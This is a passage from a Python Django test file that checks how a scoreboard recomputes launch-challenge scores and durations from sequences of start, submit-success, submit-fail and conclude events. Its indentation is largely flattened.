PiEvent.objects.all().delete()
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
pi = self.station,
team = self.team1,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 59).replace(tzinfo=utc),
type = PiEvent.EVENT_STARTED_MSG_TYPE
)
expectedScore = 0
expectedDuration_s = 0
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
    def test_recomputeLaunchScore_noStartChallengeEvents(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2001, 1, 1, 0, 0, 0).replace(tzinfo=utc),
type = PiEvent.REGISTER_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
expectedScore = 0
expectedDuration_s = 0
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventSameTimestampNoSuccessFail(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2001, 1, 1, 0, 0, 0).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
expectedScore = 1
expectedDuration_s = 0
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampNoSuccessFail(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
expectedScore = 1
expectedDuration_s = 10
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampOneSuccessNoConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
expectedScore = 3
expectedDuration_s = 10
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampOneSuccessWithConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 58).replace(tzinfo=utc),
type = PiEvent.EVENT_CONCLUDED_MSG_TYPE,
team = self.team1,
pi = self.station
)
expectedScore = 3
expectedDuration_s = 8
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampOneFailNoConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
expectedScore = 2
expectedDuration_s = 10
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampOneFailWithConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 58).replace(tzinfo=utc),
type = PiEvent.EVENT_CONCLUDED_MSG_TYPE,
team = self.team1,
pi = self.station
)
expectedScore = 2
expectedDuration_s = 8
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampTwoSuccessNoConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 57, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
expectedScore = 5
expectedDuration_s = 130
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampTwoSuccessWithConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 57, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 58).replace(tzinfo=utc),
type = PiEvent.EVENT_CONCLUDED_MSG_TYPE,
team = self.team1,
pi = self.station
)
expectedScore = 5
expectedDuration_s = 128
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampOneSuccessOneFailNoConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
expectedScore = 4
expectedDuration_s = 10
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampOneSuccessOneFailWithConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 58).replace(tzinfo=utc),
type = PiEvent.EVENT_CONCLUDED_MSG_TYPE,
team = self.team1,
pi = self.station
)
expectedScore = 4
expectedDuration_s = 8
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampTwoFailNoConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
expectedScore = 3
expectedDuration_s = 10
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampTwoFailWithConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 58).replace(tzinfo=utc),
type = PiEvent.EVENT_CONCLUDED_MSG_TYPE,
team = self.team1,
pi = self.station
)
expectedScore = 3
expectedDuration_s = 8
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampThreeSuccessNoConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
expectedScore = 7
expectedDuration_s = 10
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampThreeSuccessWithConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 58).replace(tzinfo=utc),
type = PiEvent.EVENT_CONCLUDED_MSG_TYPE,
team = self.team1,
pi = self.station
)
expectedScore = 7
expectedDuration_s = 8
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampSuccessSuccessFailNoConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
expectedScore = 6
expectedDuration_s = 10
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampSuccessSuccessFailWithConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 58).replace(tzinfo=utc),
type = PiEvent.EVENT_CONCLUDED_MSG_TYPE,
team = self.team1,
pi = self.station
)
expectedScore = 6
expectedDuration_s = 8
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampSuccessFailSuccessNoConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
expectedScore = 6
expectedDuration_s = 10
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampSuccessFailSuccessWithConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 58).replace(tzinfo=utc),
type = PiEvent.EVENT_CONCLUDED_MSG_TYPE,
team = self.team1,
pi = self.station
)
expectedScore = 6
expectedDuration_s = 8
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampSuccessFailFailNoConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
expectedScore = 5
expectedDuration_s = 10
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampSuccessFailFailWithConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 58).replace(tzinfo=utc),
type = PiEvent.EVENT_CONCLUDED_MSG_TYPE,
team = self.team1,
pi = self.station
)
expectedScore = 5
expectedDuration_s = 8
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampFailSuccessSuccessNoConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
expectedScore = 6
expectedDuration_s = 10
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampFailSuccessSuccessWithConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 58).replace(tzinfo=utc),
type = PiEvent.EVENT_CONCLUDED_MSG_TYPE,
team = self.team1,
pi = self.station
)
expectedScore = 6
expectedDuration_s = 8
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampFailSuccessFailNoConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
expectedScore = 5
expectedDuration_s = 10
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampFailSuccessFailWithConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 58).replace(tzinfo=utc),
type = PiEvent.EVENT_CONCLUDED_MSG_TYPE,
team = self.team1,
pi = self.station
)
expectedScore = 5
expectedDuration_s = 8
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampFailFailSuccessNoConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
expectedScore = 5
expectedDuration_s = 10
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampFailFailSuccessWithConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 58).replace(tzinfo=utc),
type = PiEvent.EVENT_CONCLUDED_MSG_TYPE,
team = self.team1,
pi = self.station
)
expectedScore = 5
expectedDuration_s = 8
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampThreeFailNoConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
expectedScore = 4
expectedDuration_s = 10
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
